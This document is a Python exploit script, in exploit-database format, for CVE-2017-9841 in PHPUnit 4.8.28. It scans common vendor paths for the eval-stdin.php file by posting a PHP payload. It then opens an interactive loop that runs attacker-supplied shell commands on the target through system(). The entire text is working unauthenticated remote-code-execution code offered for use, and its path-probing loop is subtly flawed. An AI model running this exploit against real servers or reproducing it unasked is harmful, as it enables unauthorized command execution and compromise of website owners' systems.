# Exploit Title: PHP Unit 4.8.28 - Remote Code Execution (RCE) (Unauthenticated) # Date: 2022/01/30 # Exploit Author: souzo # Vendor Homepage: phpunit.de # Version: 4.8.28 # Tested on: Unit # CVE : CVE-2017-9841 import requests from sys import argv phpfiles = ["/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php", "/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php", "/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php", "/laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php", "/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php", "/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] def check_vuln(site): vuln = False try: for i in phpfiles: site = site+i req = requests.get(site,headers= { "Content-Type" : "text/html", "User-Agent" : f"Mozilla/5.0 (X11; Linux x86_64; rv:95.0) Gecko/20100101 Firefox/95.0", },data="<?php echo md5(phpunit_rce); ?>") if "6dd70f16549456495373a337e6708865" in req.text: print(f"Vulnerable: {site}") return site except: return vuln def help(): exit(f"{argv[0]} <site>") def main(): if len(argv) < 2: help() if not "http" in argv[1] or not ":" in argv[1] or not "/" in argv[1]: help() site = argv[1] if site.endswith("/"): site = list(site) site[len(site) -1 ] = '' site = ''.join(site) pathvuln = check_vuln(site) if pathvuln == False: exit("Not vuln") try: while True: cmd = input("> ") req = requests.get(str(pathvuln),headers={ "User-Agent" : f"Mozilla/5.0 (X11; Linux x86_64; rv:95.0) Gecko/20100101 Firefox/95.0", "Content-Type" : "text/html" },data=f'<?php system(\'{cmd}\') ?>') print(req.text) except Exception as ex: exit("Error: " + str(ex)) main()